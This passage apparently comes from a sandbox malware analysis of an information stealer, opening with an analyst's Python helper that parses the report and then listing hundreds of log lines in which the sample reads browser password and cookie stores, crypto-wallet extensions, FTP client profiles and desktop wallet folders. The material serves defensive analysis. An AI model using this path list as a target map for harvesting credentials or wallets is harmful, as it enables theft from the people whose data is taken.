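            rules += [json.loads("{" + frag + "}") for frag in RULE_RE.findall(value)]
            for frag in EXT_RE.findall(value):
                ext = json.loads("{" + frag + "}")
                extensions[ext["en"]] = ext["ez"]
            continue
        hit = FILE_RE.search(line)
        if hit:
            opened.append(hit.group(1))
    return {"domains": sorted(domains), "rules": rules,
            "extensions": extensions, "opened": opened}


def expand_env(path: str, user: str) -> str:
    """Expand a leading %var% of a config path for the given profile (assumed layout)."""
    for var, real in ENV_DIRS.items():
        if path.lower().startswith(var):
            return real.format(user=user) + path[len(var):]
    return path


def label_opened(report: Dict, user: str = "user") -> List[Tuple[str, str]]:
    """Tag each opened path with the config rule or extension entry that explains it."""
    targets = {expand_env(rule["p"], user).lower(): rule["z"] for rule in report["rules"]}
    labels = []
    for path in report["opened"]:
        ext = EXT_DIR_RE.search(path)
        if ext:
            name = report["extensions"].get(ext.group(1), "id not in recovered config")
            labels.append((path, "extension: " + name))
        elif path.lower() in targets:
            labels.append((path, "config rule: " + targets[path.lower()]))
        else:
            labels.append((path, "not covered by recovered config fragments"))
    return labels


if __name__ == "__main__":
    report = parse_report(REPORT_LINES)
    print("C2 domains:", ", ".join(report["domains"]))
    for rule in report["rules"]:
        print("collects", expand_env(rule["p"], "user"), "->", rule["z"])
    for path, label in label_opened(report):
        print(label, "<-", path)
```

                Run against the full row set of this report, the "not covered" bucket is the useful output: it separates paths explained by the fragments that happened to survive in memory (Exodus, Ledger Live, the Bitget Wallet extension directory) from paths such as the FTP client profiles that come from parts of the configuration this report never shows, and so should be hunted for rather than inferred.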
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffla
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffla
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
